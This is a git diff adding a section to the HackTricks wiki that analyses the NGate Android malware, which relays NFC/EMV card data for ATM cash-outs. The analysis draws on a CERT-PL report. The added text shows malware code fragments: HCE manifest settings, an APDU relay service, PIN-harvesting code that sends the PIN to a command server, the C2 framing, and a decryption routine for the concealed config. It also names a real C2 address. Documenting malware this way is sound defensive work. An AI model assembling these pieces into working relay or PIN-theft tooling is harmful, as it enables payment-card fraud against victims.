Merge pull request #1556 from HackTricks-wiki/update_Analysis_of_NGate_malware_campaign__NFC_relay__20251106_124001

carlospolop · web-flow · commit 6ad5d8d3bc73 · 2025-11-12T14:20:35.000+01:00
Analysis of NGate malware campaign (NFC relay)
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
@@ -156,6 +156,121 @@ If you need a **long-range**, **battery-powered** solution for harvesting HID Pr
 maxiprox-mobile-cloner.md
 {{#endref}}
 
+## NFC/EMV Relay via Android Reader↔HCE Emitter
+
+Classic EMV relay can be implemented with 2 Android devices: a victim-side reader that captures live APDUs and PIN from a real card, and an attacker-side HCE emitter at the terminal that forwards APDUs upstream. The analyzed NGate kit abuses legit Android NFC APIs and a simple framed TCP C2 to orchestrate real-time ATM cash-outs.
+
+Key building blocks
+
+- Reader-mode app (victim): uses NFC reader APIs to parse EMV (PAN/expiry/AIDs), displays scheme by AID, asks for PIN and exfiltrates immediately.
+- Emitter-mode app (ATM side): implements Host Card Emulation (HCE) with `android:requireDeviceUnlock="false"` and a payment AID; `processCommandApdu()` forwards APDUs to C2 and returns minimal response.
+- Wire protocol: length-prefixed frames, periodic keepalive; optionally TLS.
+
+Android surface (Manifest/HCE)
+
+```xml
+<uses-permission android:name="android.permission.NFC"/>
+<uses-permission android:name="android.permission.INTERNET"/>
+<service android:name=".nfc.hce.ApduService"
+         android:permission="android.permission.BIND_NFC_SERVICE"
+         android:exported="true">
+  <intent-filter>
+    <action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
+    <category android:name="android.intent.category.DEFAULT"/>
+  </intent-filter>
+  <meta-data android:name="android.nfc.cardemulation.host_apdu_service"
+             android:resource="@xml/hce"/>
+</service>
+```
+
+hce.xml example (no unlock + payment AID)
+
+```xml
+<host-apdu-service android:requireDeviceUnlock="false"
+                   android:description="relay">
+  <aid-group android:category="other">
+    <aid-filter android:name="F001020304050607"/>
+  </aid-group>
+  <aid-group android:category="payment">
+    <aid-filter android:name="F001020304050607"/>
+  </aid-group>
+</host-apdu-service>
+```
+
+Transparent relay endpoint (HCE)
+
+```java
+@Override public byte[] processCommandApdu(byte[] apdu, Bundle extras) {
+  Log.d("ApduService", "APDU-IN: " + toHex(apdu));
+  bus.forward(apdu); // send upstream to C2/reader
+  return new byte[0]; // empty response, pure relay endpoint
+}
+```
+
+EMV scheme inference by AID (examples)
+
+- A000000004 → Mastercard
+- A000000003 → Visa
+- A000000658 → MIR
+- A000000333 → UnionPay
+
+PIN harvesting pattern (victim UI)
+
+```java
+// Custom keypad publishes when required length (e.g., 4) is reached
+if (pin.length() == 4) postDelayed(() -> bus.publish(pin), 100L);
+// Network immediately exfiltrates via dedicated opcode
+send(OP_PIN_REQ, pin.getBytes(StandardCharsets.UTF_8));
+```
+
+Framed C2 (cleartext example)
+
+- Client→Server: int32 len | int32 opcode | body
+- Server→Client: int32 len | body (opcode inside payload)
+- Reject bodies > ~100 MiB; keepalive ~7s (PING)
+
+```java
+// send
+out.writeInt(body.length); out.writeInt(op); out.write(body); out.flush();
+// recv
+int len = in.readInt(); byte[] body = new byte[len]; in.readFully(body);
+```
+
+Config concealment: cert-derived XOR
+
+- Native lib derives a 32-byte key as SHA‑256 of the app signing certificate (DER).
+- C2 config is ASCII‑hex in assets (e.g., `assets/____`), hex-decoded and XOR-ed with the key repeating every 32 bytes:
+
+```c
+for (size_t i = 0; i < len; i++) pt[i] = ct[i] ^ key[i & 31];
+```
+
+Offline PoC to decrypt config
+
+```bash
+# Extract signing cert digest
+apksigner verify --print-certs sample.apk
+# "Signer #1 certificate SHA-256 digest: <hex>"
+```
+
+```python
+import pathlib
+key = bytes.fromhex("<sha256_of_signing_cert>")
+ct  = bytes.fromhex(pathlib.Path("/path/to/assets/____").read_text().strip())
+pt  = bytes(c ^ key[i % 32] for i, c in enumerate(ct))
+print(pt.decode("utf-8", errors="replace"))
+```
+
+Sample decrypted fields: `host`, `port`, `sharedToken`, `tls`, `mode`, `reader`, `uniqueID`, `ttd`.
+
+Relay chain (end-to-end)
+
+1) Victim installs APK, opens app → native init decrypts config from assets.
+2) App connects to C2 (e.g., `91.84.97.13:5653`) using framed TCP; keepalive ~7s.
+3) Victim taps card → reader extracts PAN/expiry/AIDs and sends CARD_DISCOVERED.
+4) Victim enters PIN → keypad publishes and exfiltrates via PIN_REQ; server replies VALID/INVALID for UI only.
+5) Attacker device at terminal runs HCE emitter relaying APDUs to the ATM and performs cash-out.
+
 ---
 
 ## References
@@ -165,5 +280,8 @@ maxiprox-mobile-cloner.md
 - [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
 - [MIFARE security overview (Wikipedia)](https://en.wikipedia.org/wiki/MIFARE#Security)
 - [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
+- [Analysis of NGate malware campaign (CERT-PL)](https://cert.pl/en/posts/2025/11/analiza-ngate/)
+- [Android apksigner – verify/print-certs](https://developer.android.com/studio/command-line/apksigner)
+- [Android Host Card Emulation (HCE) overview](https://developer.android.com/guide/topics/connectivity/nfc/hce)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
